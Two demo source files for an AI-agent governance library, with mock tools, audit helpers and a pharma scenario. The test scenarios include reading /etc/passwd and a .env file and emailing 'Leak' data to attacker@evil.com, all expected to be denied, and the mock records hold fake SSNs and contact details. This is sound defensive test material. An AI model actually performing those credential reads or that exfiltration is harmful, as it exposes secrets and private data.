File: adapters/typescript/shared.ts
/**
 * Shared utilities for Edictum TypeScript adapter demos.
 *
 * Mock tools, scenarios, audit helpers, and formatting used by every demo.
 * Mirrors the Python shared_v2.py infrastructure.
 */

import { fileURLToPath } from "node:url";
import { dirname, resolve } from "node:path";
import { readFileSync } from "node:fs";
import { createRequire } from "node:module";

// Polyfill require() for tsx/ESM — @edictum/core's bundled __require shim
// needs it to load the optional js-yaml peer dependency.
const _require = createRequire(import.meta.url);
if (typeof globalThis.require === "undefined") {
  (globalThis as Record<string, unknown>).require = _require;
}

import {
  Edictum,
  EdictumDenied,
  AuditAction,
  CollectingAuditSink,
  createPrincipal,
  VERSION,
} from "@edictum/core";
import type { Principal, AuditEvent } from "@edictum/core";

// ---------------------------------------------------------------------------
// __dirname for ESM
// ---------------------------------------------------------------------------

const __filename = fileURLToPath(import.meta.url);
const __dirname = dirname(__filename);

export const CONTRACTS_PATH = resolve(__dirname, "../contracts.yaml");

// ---------------------------------------------------------------------------
// Mock tool implementations
// ---------------------------------------------------------------------------

export function getWeather(args: Record<string, unknown>): string {
  const city = String(args.city ?? "Unknown");
  const conditions = ["sunny", "cloudy", "rainy", "snowy", "windy"];
  const temp = Math.floor(Math.random() * 40) - 5;
  const cond = conditions[Math.floor(Math.random() * conditions.length)];
  return `${city}: ${cond}, ${temp}C`;
}

export function searchWeb(args: Record<string, unknown>): string {
  const query = String(args.query ?? "");
  return JSON.stringify({
    results: [
      { title: `Result 1 for '${query}'`, url: "https://example.com/1" },
      { title: `Result 2 for '${query}'`, url: "https://example.com/2" },
    ],
  });
}

export function readFile(args: Record<string, unknown>): string {
  const path = String(args.path ?? "");
  if (path.includes("broken")) {
    return "Error: Permission denied";
  }
  if (path.toLowerCase().includes("secret") || path.includes("passwd")) {
    return `Contents of ${path}: root:x:0:0:root:/root:/bin/bash`;
  }
  if (path.includes("contacts")) {
    return JSON.stringify({
      contacts: [
        {
          name: "Jane Doe",
          email: "jane@example.com",
          phone: "(415) 555-0123",
          ssn: "123-45-6789",
        },
        {
          name: "John Smith",
          email: "john@company.com",
          phone: "(212) 555-9876",
        },
      ],
    });
  }
  return `Contents of ${path}: [simulated file content, no sensitive data]`;
}

export function sendEmail(args: Record<string, unknown>): string {
  const subject = String(args.subject ?? "");
  return JSON.stringify({ status: "sent", message_id: `msg-${Date.now()}`, subject });
}

export function updateRecord(args: Record<string, unknown>): string {
  const recordId = String(args.record_id ?? "");
  const data = args.data;
  return JSON.stringify({ status: "updated", record_id: recordId, data });
}

export function deleteRecord(args: Record<string, unknown>): string {
  const recordId = String(args.record_id ?? "");
  return JSON.stringify({ status: "deleted", record_id: recordId });
}

// ---------------------------------------------------------------------------
// Tool map
// ---------------------------------------------------------------------------

export const TOOL_MAP: Record<
  string,
  (args: Record<string, unknown>) => string
> = {
  get_weather: getWeather,
  search_web: searchWeb,
  read_file: readFile,
  send_email: sendEmail,
  update_record: updateRecord,
  delete_record: deleteRecord,
};

// ---------------------------------------------------------------------------
// Test scenarios
// ---------------------------------------------------------------------------

export interface Scenario {
  name: string;
  tool: string;
  args: Record<string, unknown>;
  expected: "allowed" | "denied" | "redact" | "approval" | "observe";
}

/** All 17 scenarios matching Python's SCENARIOS. */
export const SCENARIOS: Scenario[] = [
  {
    name: "Weather lookup (allowed)",
    tool: "get_weather",
    args: { city: "Tokyo" },
    expected: "allowed",
  },
  {
    name: "Read safe file (DENIED: sandbox bug — should be allowed)",
    tool: "read_file",
    args: { path: "/home/user/notes.txt" },
    expected: "denied", // sandbox wiring bug: YAML sandbox contracts always deny
  },
  {
    name: "Read contacts (DENIED: sandbox bug — should be redacted)",
    tool: "read_file",
    args: { path: "/home/user/contacts.json" },
    expected: "denied", // sandbox wiring bug: YAML sandbox contracts always deny
  },
  {
    name: "Read /etc/passwd (DENIED: sandbox)",
    tool: "read_file",
    args: { path: "/etc/passwd" },
    expected: "denied",
  },
  {
    name: "Read .env file (DENIED: no-sensitive-files)",
    tool: "read_file",
    args: { path: "/home/app/.env.production" },
    expected: "denied",
  },
  {
    name: "Read outside sandbox (DENIED)",
    tool: "read_file",
    args: { path: "/opt/secret/config.yaml" },
    expected: "denied",
  },
  {
    name: "Email to company (allowed + observe audit)",
    tool: "send_email",
    args: { to: "alice@company.com", subject: "Hello", body: "Hi" },
    expected: "allowed",
  },
  {
    name: "Email to evil domain (DENIED: no-email-to-external)",
    tool: "send_email",
    args: { to: "attacker@evil.com", subject: "Leak", body: "data" },
    expected: "denied",
  },
  {
    name: "Search web (allowed)",
    tool: "search_web",
    args: { query: "edictum governance" },
    expected: "allowed",
  },
  {
    name: "Delete without admin role (DENIED: RBAC)",
    tool: "delete_record",
    args: { record_id: "REC-001" },
    expected: "denied",
  },
  {
    name: "Update record confirmed (allowed)",
    tool: "update_record",
    args: { record_id: "REC-002", data: "new value", confirmed: true },
    expected: "allowed",
  },
  {
    name: "Update record unconfirmed (approval required)",
    tool: "update_record",
    args: { record_id: "REC-003", data: "risky" },
    expected: "approval",
  },
  {
    name: "Weather #2 (rate limit counting)",
    tool: "get_weather",
    args: { city: "London" },
    expected: "allowed",
  },
  {
    name: "Weather #3",
    tool: "get_weather",
    args: { city: "Berlin" },
    expected: "allowed",
  },
  {
    name: "Weather #4",
    tool: "get_weather",
    args: { city: "Sydney" },
    expected: "allowed",
  },
  {
    name: "Weather #5 (last allowed)",
    tool: "get_weather",
    args: { city: "NYC" },
    expected: "allowed",
  },
  {
    name: "Weather #6 (DENIED: rate limit)",
    tool: "get_weather",
    args: { city: "LA" },
    expected: "denied",
  },
];

/** Quick subset: skip scenarios that would block waiting for HITL approval.
 * Includes rate-limit exhaustion scenarios that depend on ordering. */
export const QUICK_SCENARIOS: Scenario[] = SCENARIOS.filter(
  (s) => s.expected !== "approval",
);

// ---------------------------------------------------------------------------
// Guard creation
// ---------------------------------------------------------------------------

export function createStandaloneGuard(mode?: "enforce" | "observe"): Edictum {
  return Edictum.fromYaml(CONTRACTS_PATH, {
    mode: mode ?? "enforce",
    auditSink: [], // suppress stdout; guard.localSink always available
  });
}

export function makePrincipal(
  role: string = "analyst",
): Principal {
  return createPrincipal({
    userId: `demo-${role}`,
    role,
    claims: { department: "engineering", team: "platform" },
  });
}

// ---------------------------------------------------------------------------
// Audit classification
// ---------------------------------------------------------------------------

/** Classify a scenario result from audit events since a given mark. */
export function classifyResult(
  sink: CollectingAuditSink,
  mark: number,
  toolName: string,
): { action: string; detail: string } | null {
  const recent = sink.sinceMark(mark);
  if (recent.length === 0) return null;

  // Check for hard denials first
  for (const e of recent) {
    if (e.action === AuditAction.CALL_DENIED) {
      const reason = e.reason ?? "";
      const name = e.decisionName ?? "";
      const detail = name ? `${name}: ${reason}`.slice(0, 100) : reason.slice(0, 100);
      return { action: "DENIED", detail };
    }
    if (e.action === AuditAction.CALL_APPROVAL_REQUESTED) {
      return { action: "APPROVAL", detail: `${toolName} requires approval` };
    }
  }

  // Check postcondition results. Only CALL_EXECUTED events carry
  // postconditionsPassed (non-null), so iterating all events is safe —
  // non-executed events have postconditionsPassed === null.
  for (const e of recent) {
    if (e.postconditionsPassed === false) {
      return { action: "REDACTED", detail: "PII detected and redacted in output" };
    }
  }

  // Check for allowed/executed (takes precedence over observe-mode audits)
  for (const e of recent) {
    if (
      e.action === AuditAction.CALL_ALLOWED ||
      e.action === AuditAction.CALL_EXECUTED
    ) {
      return { action: "ALLOWED", detail: `${toolName} executed` };
    }
  }

  // Observe-mode: CALL_WOULD_DENY fired but no execution followed
  for (const e of recent) {
    if (e.action === AuditAction.CALL_WOULD_DENY) {
      const reason = e.reason ?? "";
      return { action: "OBSERVE", detail: `would-deny: ${reason}`.slice(0, 100) };
    }
  }

  return null;
}

// ---------------------------------------------------------------------------
// Formatting helpers
// ---------------------------------------------------------------------------

const RESET = "\x1b[0m";
const GREEN = "\x1b[32m";
const RED = "\x1b[31m";
const YELLOW = "\x1b[33m";
const CYAN = "\x1b[36m";
const DIM = "\x1b[2m";
const BOLD = "\x1b[1m";

export function printBanner(adapterName: string): void {
  console.log("=".repeat(70));
  console.log(`  EDICTUM ${adapterName.toUpperCase()} DEMO (TypeScript)`);
  console.log("=".repeat(70));
  console.log(`  Mode:    enforce`);
  console.log(`  Source:  local YAML`);
  console.log(`  Version: @edictum/core ${VERSION}`);
  console.log();
}

export function printScenario(idx: number, total: number, desc: string): void {
  console.log();
  console.log(`${DIM}${"─".repeat(60)}${RESET}`);
  console.log(`  ${CYAN}[${idx}/${total}]${RESET} ${desc}`);
  console.log(`${DIM}${"─".repeat(60)}${RESET}`);
}

export function printResult(action: string, detail: string): void {
  const icons: Record<string, string> = {
    DENIED: "X",
    ALLOWED: "+",
    REDACTED: "~",
    APPROVAL: "?",
    OBSERVE: "o",
    WARNING: "!",
  };
  const colors: Record<string, string> = {
    DENIED: YELLOW,
    ALLOWED: GREEN,
    REDACTED: YELLOW,
    APPROVAL: YELLOW,
    OBSERVE: CYAN,
  };
  const icon = icons[action] ?? "|";
  const color = colors[action] ?? RESET;
  console.log(`  ${color}[${icon}] ${action}:${RESET} ${detail}`);
}

export function printAuditSummary(sink: CollectingAuditSink): void {
  const events = sink.events;
  if (events.length === 0) {
    console.log("  No audit events recorded.");
    return;
  }

  let allowed = 0;
  let denied = 0;
  let wouldDeny = 0;
  let piiRedacted = 0;
  let approvalReq = 0;

  // Count by action — use CALL_EXECUTED (not CALL_ALLOWED) to avoid
  // double-counting when both events fire for the same tool call.
  for (const e of events) {
    if (e.action === AuditAction.CALL_EXECUTED) allowed++;
    if (e.action === AuditAction.CALL_DENIED) denied++;
    if (e.action === AuditAction.CALL_WOULD_DENY) wouldDeny++;
    if (e.postconditionsPassed === false) piiRedacted++;
    if (e.action === AuditAction.CALL_APPROVAL_REQUESTED) approvalReq++;
  }

  console.log();
  console.log(`${BOLD}${"=".repeat(60)}${RESET}`);
  console.log(`  ${BOLD}GOVERNANCE SUMMARY${RESET}`);
  console.log(`${BOLD}${"=".repeat(60)}${RESET}`);
  console.log(`  Total events:      ${events.length}`);
  console.log(`  ${GREEN}Allowed:           ${allowed}${RESET}`);
  console.log(`  ${YELLOW}Denied:            ${denied}${RESET}`);
  if (wouldDeny > 0) {
    console.log(`  ${CYAN}Would-deny (obs):  ${wouldDeny}${RESET}`);
  }
  if (piiRedacted > 0) {
    console.log(`  ${YELLOW}PII redactions:    ${piiRedacted}${RESET}`);
  }
  if (approvalReq > 0) {
    console.log(`  Approval requests: ${approvalReq}`);
  }

  if (denied > 0) {
    console.log();
    console.log(`  Contracts enforced:`);
    for (const e of events) {
      if (e.action === AuditAction.CALL_DENIED) {
        const reason = (e.reason ?? "").slice(0, 70);
        const name = e.decisionName ?? "";
        console.log(`    ${YELLOW}X ${name}: ${reason}${RESET}`);
      }
    }
  }
  console.log();
}

// ---------------------------------------------------------------------------
// Scenario runner (framework-agnostic via guard.run)
// ---------------------------------------------------------------------------

export interface ScenarioResult {
  name: string;
  expected: string;
  actual: string;
  detail: string;
  match: boolean;
}

/**
 * Run all scenarios through a guard using guard.run().
 * Returns results for validation.
 */
export async function runScenarios(
  guard: Edictum,
  scenarios: Scenario[],
  adapterLabel: string,
): Promise<ScenarioResult[]> {
  const results: ScenarioResult[] = [];
  const sink = guard.localSink;

  for (let i = 0; i < scenarios.length; i++) {
    const scenario = scenarios[i];
    const mark = sink.mark();
    printScenario(i + 1, scenarios.length, scenario.name);

    try {
      const toolFn = TOOL_MAP[scenario.tool];
      if (!toolFn) {
        printResult("ERROR", `Unknown tool: ${scenario.tool}`);
        results.push({
          name: scenario.name,
          expected: scenario.expected,
          actual: "error",
          detail: `Unknown tool: ${scenario.tool}`,
          match: false,
        });
        continue;
      }

      await guard.run(
        scenario.tool,
        scenario.args,
        async (args) => toolFn(args),
      );

      // Classify from audit events
      const classification = classifyResult(sink, mark, scenario.tool);
      if (classification) {
        printResult(classification.action, classification.detail);
        const actualNorm = normalizeAction(classification.action);
        const match = actualNorm === scenario.expected;
        if (!match) {
          console.log(
            `    ${RED}MISMATCH: expected=${scenario.expected} actual=${actualNorm}${RESET}`,
          );
        }
        results.push({
          name: scenario.name,
          expected: scenario.expected,
          actual: actualNorm,
          detail: classification.detail,
          match,
        });
      } else {
        printResult("ALLOWED", `${scenario.tool} executed`);
        const match = scenario.expected === "allowed";
        if (!match) {
          console.log(
            `    ${RED}MISMATCH: expected=${scenario.expected} actual=allowed${RESET}`,
          );
        }
        results.push({
          name: scenario.name,
          expected: scenario.expected,
          actual: "allowed",
          detail: `${scenario.tool} executed`,
          match,
        });
      }
    } catch (err) {
      if (err instanceof EdictumDenied) {
        printResult("DENIED", err.message.slice(0, 100));
        const match =
          scenario.expected === "denied" || scenario.expected === "approval";
        if (!match) {
          console.log(
            `    ${RED}MISMATCH: expected=${scenario.expected} actual=denied${RESET}`,
          );
        }
        results.push({
          name: scenario.name,
          expected: scenario.expected,
          actual: scenario.expected === "approval" ? "approval" : "denied",
          detail: err.message.slice(0, 100),
          match,
        });
      } else {
        const msg = err instanceof Error ? err.message : String(err);
        printResult("ERROR", msg.slice(0, 100));
        results.push({
          name: scenario.name,
          expected: scenario.expected,
          actual: "error",
          detail: msg.slice(0, 100),
          match: false,
        });
      }
    }
  }

  return results;
}

function normalizeAction(action: string): string {
  switch (action.toUpperCase()) {
    case "DENIED":
      return "denied";
    case "ALLOWED":
      return "allowed";
    case "REDACTED":
      return "redact";
    case "APPROVAL":
      return "approval";
    case "OBSERVE":
      return "observe";
    default:
      return action.toLowerCase();
  }
}

// ---------------------------------------------------------------------------
// Summary printer
// ---------------------------------------------------------------------------

export function printResultsSummary(
  adapterName: string,
  results: ScenarioResult[],
): boolean {
  const passed = results.filter((r) => r.match).length;
  const failed = results.filter((r) => !r.match).length;
  const total = results.length;

  console.log();
  console.log(`${BOLD}${"=".repeat(60)}${RESET}`);
  console.log(
    `  ${BOLD}${adapterName.toUpperCase()} RESULTS: ${passed}/${total} passed${RESET}`,
  );
  console.log(`${BOLD}${"=".repeat(60)}${RESET}`);

  if (failed > 0) {
    console.log();
    console.log(`  ${RED}Failed scenarios:${RESET}`);
    for (const r of results.filter((r) => !r.match)) {
      console.log(
        `    ${RED}X ${r.name}: expected=${r.expected} actual=${r.actual}${RESET}`,
      );
    }
  }

  console.log();
  return failed === 0;
}

File: adapters/shared.py
"""
Shared utilities for Edictum adapter demos.
============================================
Mock pharma data, tool functions, audit helpers, formatting, and CLI parsing
used by every adapter demo.
"""

from __future__ import annotations

import argparse
import json
import re
from datetime import datetime
from pathlib import Path

from dotenv import load_dotenv

load_dotenv(Path(__file__).parent.parent / ".env")

import sys as _sys  # noqa: E402
_sys.path.insert(0, str(Path(__file__).parent.parent / "observability"))

from edictum import Principal  # noqa: E402
from edictum.audit import AuditAction  # noqa: E402


def setup_otel() -> str:
    """Configure OpenTelemetry from env vars. Returns mode: 'otlp' | 'console' | 'disabled'."""
    from otel_config import configure_otel
    mode = configure_otel()
    if mode != "disabled":
        print(f"  OTel: {mode}")
    return mode


def teardown_otel():
    """Flush and shut down OTel providers."""
    from otel_config import shutdown_otel
    shutdown_otel()


# ─── Paths ──────────────────────────────────────────────────────────────────

RULES_PATH = Path(__file__).parent.parent / "scenarios" / "pharma" / "pharma_rules.yaml"


# ─── Mock clinical databases ───────────────────────────────────────────────

TRIAL_SUMMARY = {
    "trial_id": "NCT-2024-7891",
    "phase": "Phase III",
    "indication": "Type 2 Diabetes Mellitus",
    "compound": "CG-4582",
    "status": "Active, enrolling",
    "sites": 42,
    "enrolled": 1847,
    "primary_endpoint": "HbA1c reduction at Week 24",
}

ADVERSE_EVENTS_SUMMARY = [
    {"event_id": "AE-001", "term": "Nausea", "grade": 1, "serious": False, "count": 127, "rate": "6.9%"},
    {"event_id": "AE-002", "term": "Headache", "grade": 1, "serious": False, "count": 89, "rate": "4.8%"},
    {"event_id": "AE-003", "term": "Hypoglycemia", "grade": 2, "serious": True, "count": 23, "rate": "1.2%"},
    {"event_id": "AE-004", "term": "Hepatic enzyme elevation", "grade": 3, "serious": True, "count": 4, "rate": "0.2%"},
    {"event_id": "AE-005", "term": "Injection site reaction", "grade": 1, "serious": False, "count": 201, "rate": "10.9%"},
]

# Contains PII intentionally — postconditions should catch it
ADVERSE_EVENTS_DETAILED = [
    {
        "event_id": "AE-003-017",
        "patient": "PAT-28491",
        "site": "Johns Hopkins Site 12",
        "term": "Severe hypoglycemia",
        "grade": 3,
        "serious": True,
        "onset": "2025-11-14",
        "outcome": "Recovered",
        "narrative": (
            "Patient PAT-28491, Margaret Chen, age 67 (DOB 03/15/1958), experienced severe "
            "hypoglycemic episode requiring hospitalization. Blood glucose 38 mg/dL. "
            "Patient SSN 847-29-1038. Contact: m.chen@email.com, (410) 555-0193. "
            "Concomitant insulin use identified as contributing factor."
        ),
    },
    {
        "event_id": "AE-004-002",
        "patient": "PAT-31205",
        "site": "Cleveland Clinic Site 7",
        "term": "ALT elevation >5x ULN",
        "grade": 3,
        "serious": True,
        "onset": "2025-12-02",
        "outcome": "Recovering",
        "narrative": (
            "Patient PAT-31205 presented with ALT 287 U/L (5.2x ULN). "
            "Investigator contact: dr.williams@clevelandclinic.org, +1-216-444-2200. "
            "Drug discontinued per protocol. Follow-up LFTs trending down."
        ),
    },
]

CASE_REPORTS = {
    "AE-003-017": {
        "status": "Draft",
        "last_modified": "2025-12-20",
        "author": "Dr. Sarah Kim",
        "sections": ["Patient Demographics", "Event Description", "Assessment", "Narrative"],
    },
}


# ─── Plain tool functions (no framework decorators) ────────────────────────

def query_clinical_data(dataset: str, query: str = "") -> str:
    """Query clinical trial databases. Available datasets: trial_summary, adverse_events_summary, adverse_events_detailed, patient_records, lab_results."""
    if dataset == "trial_summary":
        return json.dumps(TRIAL_SUMMARY, indent=2)
    elif dataset == "adverse_events_summary":
        return json.dumps(ADVERSE_EVENTS_SUMMARY, indent=2)
    elif dataset == "adverse_events_detailed":
        return json.dumps(ADVERSE_EVENTS_DETAILED, indent=2)
    elif dataset == "patient_records":
        return json.dumps({"error": "Direct patient record access not available through this interface."})
    else:
        return json.dumps({"error": f"Unknown dataset: {dataset}"})


def update_case_report(event_id: str, section: str, content: str) -> str:
    """Update a section of an adverse event case report."""
    if event_id not in CASE_REPORTS:
        return json.dumps({"error": f"Case report {event_id} not found."})
    return json.dumps({
        "status": "updated",
        "event_id": event_id,
        "section": section,
        "timestamp": datetime.now().isoformat(),
        "content_preview": content[:100] + "..." if len(content) > 100 else content,
    })


def export_regulatory_document(document_type: str, trial_id: str, content: str) -> str:
    """Export a document for regulatory submission (e.g., safety narrative for IND/NDA)."""
    return json.dumps({
        "status": "exported",
        "document_type": document_type,
        "trial_id": trial_id,
        "timestamp": datetime.now().isoformat(),
        "content": content,
        "format": "eCTD Module 2.7.4",
    })


def search_medical_literature(terms: str, max_results: int = 5) -> str:
    """Search medical literature for relevant publications."""
    return json.dumps({
        "results": [
            {"title": "Hypoglycemia management in T2DM trials: systematic review", "journal": "Lancet Diabetes", "year": 2025},
            {"title": "Hepatotoxicity signals in GLP-1 receptor agonist trials", "journal": "Drug Safety", "year": 2024},
            {"title": "Best practices for adverse event narrative writing", "journal": "Pharmacoepidemiology", "year": 2025},
        ][:max_results]
    })


# ─── PII redaction ─────────────────────────────────────────────────────────

def redact_pii(text: str) -> str:
    """Replace PII patterns with redaction markers.

    Regex-based PII detection is a baseline. Production deployments should
    use ML-based PII scanners (Presidio, Phileas, etc.) behind the same
    postcondition contract interface.
    """
    text = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[SSN REDACTED]', text)
    text = re.sub(r'\bPAT-\d{4,8}\b', '[PATIENT-ID REDACTED]', text)
    text = re.sub(r'\b[A-Z][a-z]+\s[A-Z][a-z]+(?=,?\s*(?:age|DOB|born))', '[NAME REDACTED]', text)
    text = re.sub(r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b', '[EMAIL REDACTED]', text)
    text = re.sub(r'\b(\+1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b', '[PHONE REDACTED]', text)
    text = re.sub(r'\b(0[1-9]|1[0-2])/(0[1-9]|[12]\d|3[01])/\d{4}\b', '[DOB REDACTED]', text)
    return text


# ─── CollectingAuditSink ───────────────────────────────────────────────────

class CollectingAuditSink:
    """In-memory audit sink that collects events for display."""

    def __init__(self):
        self.events = []

    async def emit(self, event):
        self.events.append(event)

    def last(self):
        assert self.events, "No audit events emitted"
        return self.events[-1]

    def filter(self, action):
        return [e for e in self.events if e.action == action]

    def clear(self):
        self.events.clear()


# ─── System prompt & default task ──────────────────────────────────────────

SYSTEM_PROMPT = """You are a pharmacovigilance AI assistant helping with clinical trial safety data.
You have access to clinical databases, case reports, and regulatory export tools.

IMPORTANT RULES:
- Always start by querying the trial summary to understand the trial context.
- When analyzing adverse events, first check the summary, then detailed records if needed.
- When updating case reports, always provide substantive clinical content.
- When exporting regulatory documents, follow eCTD Module 2.7.4 format.
- If a tool call is denied, read the denial reason carefully and adjust your approach.
- Never fabricate clinical data. Only use data returned by the tools."""

DEFAULT_TASK = (
    "Review the safety profile of trial NCT-2024-7891. "
    "Start with the trial summary, then analyze the adverse events. "
    "Look at the detailed records for any serious events. "
    "Update the case report for AE-003-017 with your clinical assessment. "
    "Finally, prepare a brief safety narrative for regulatory submission."
)


# ─── Formatting helpers ───────────────────────────────────────────────────

def print_header(text: str):
    print(f"\n{'─' * 70}")
    print(f"  {text}")
    print(f"{'─' * 70}")


def print_event(label: str, detail: str, icon: str = "│"):
    print(f"  {icon} {label}: {detail}")


def print_governance(action: str, detail: str):
    icons = {
        "DENIED": "⛔",
        "ALLOWED": "✓",
        "WARNING": "⚠",
        "OBSERVE": "👁",
    }
    icon = icons.get(action, "│")
    print(f"  {icon} [{action}] {detail}")


def print_banner(adapter_name: str, principal: Principal, mode: str):
    print("=" * 70)
    print(f"  EDICTUM ADAPTER DEMO — {adapter_name.upper()}")
    print("=" * 70)
    print_event("Principal", f"{principal.user_id} (role: {principal.role}, ticket: {principal.ticket_ref or 'none'})")
    print_event("Mode", mode)
    print_event("Rules", str(RULES_PATH))
    print()


def print_audit_summary(sink: CollectingAuditSink):
    """Print formatted audit trail from a CollectingAuditSink."""
    print_header("AUDIT TRAIL")

    if not sink.events:
        print("  No audit events recorded.")
        return

    print(f"  {len(sink.events)} events recorded\n")

    for i, event in enumerate(sink.events, 1):
        action = event.action.value if hasattr(event.action, 'value') else str(event.action)
        tool_name = getattr(event, 'tool_name', '?')
        postcond = getattr(event, 'postconditions_passed', None)

        icons = {
            "call_allowed": "✓",
            "call_denied": "⛔",
            "call_would_deny": "👁",
            "call_executed": "✓",
            "postcondition_warning": "⚠",
        }
        icon = icons.get(action, "│")

        print(f"  {icon} Event {i}: {action}")
        print(f"    Tool: {tool_name}")
        if postcond is False:
            print(f"    ⚠ Postcondition warning: PII/PHI detected in output")
        print()

    # Summary counts
    print_header("GOVERNANCE SUMMARY")
    allowed = len(sink.filter(AuditAction.CALL_ALLOWED)) + len(sink.filter(AuditAction.CALL_EXECUTED))
    denied = len(sink.filter(AuditAction.CALL_DENIED))
    would_deny = len(sink.filter(AuditAction.CALL_WOULD_DENY))
    pii_warnings = sum(1 for e in sink.events if getattr(e, 'postconditions_passed', None) is False)

    print(f"  Tool calls:        {allowed + denied}")
    print(f"  Allowed:           {allowed}")
    print(f"  Denied:            {denied}")
    if would_deny:
        print(f"  Would-deny (obs):  {would_deny}")
    if pii_warnings:
        print(f"  PII warnings:      {pii_warnings}")
    print(f"  Audit events:      {len(sink.events)}")
    print()

    if denied > 0:
        print("  Rules enforced:")
        for e in sink.filter(AuditAction.CALL_DENIED):
            reason = getattr(e, 'reason', '') or ''
            decision = getattr(e, 'decision_name', '') or ''
            print(f"    ⛔ {decision}: {reason[:80]}")
        print()

    if pii_warnings > 0:
        print("  PII/PHI detections:")
        for e in sink.events:
            if getattr(e, 'postconditions_passed', None) is False:
                print(f"    ⚠ {getattr(e, 'tool_name', '?')}: output contained potential patient identifiers")
        print()


def print_token_summary(input_tokens: int, output_tokens: int, llm_calls: int):
    """Print token usage and cost estimate for GPT-4.1."""
    if input_tokens == 0 and output_tokens == 0:
        return

    cost_in = input_tokens * 2.00 / 1_000_000
    cost_out = output_tokens * 8.00 / 1_000_000
    total_cost = cost_in + cost_out

    print(f"  ── Token Usage (gpt-4.1) ──")
    print(f"  LLM round-trips:   {llm_calls}")
    print(f"  Prompt tokens:     {input_tokens:,}")
    print(f"  Completion tokens: {output_tokens:,}")
    print(f"  Total tokens:      {input_tokens + output_tokens:,}")
    print(f"  Est. cost:         ${total_cost:.4f}")
    print()


# ─── CLI argument parsing ──────────────────────────────────────────────────

def parse_args(adapter_name: str = "adapter"):
    parser = argparse.ArgumentParser(description=f"Edictum {adapter_name} Demo")
    parser.add_argument("--mode", default="enforce",
                        choices=["enforce", "observe"],
                        help="Governance mode (default: enforce)")
    parser.add_argument("--role", default="pharmacovigilance",
                        choices=["pharmacovigilance", "researcher", "clinical_data_manager", "medical_monitor"],
                        help="Principal role (default: pharmacovigilance)")
    parser.add_argument("--ticket", default=None,
                        help="Ticket/CAPA reference (e.g., CAPA-2025-042)")
    parser.add_argument("--task", default=None,
                        help="Custom task for the agent")
    return parser.parse_args()


def make_principal(role: str, ticket_ref: str | None = None) -> Principal:
    return Principal(
        user_id=f"demo-{role}",
        role=role,
        ticket_ref=ticket_ref,
        claims={"department": "pharmacovigilance", "trial": "NCT-2024-7891"},
    )
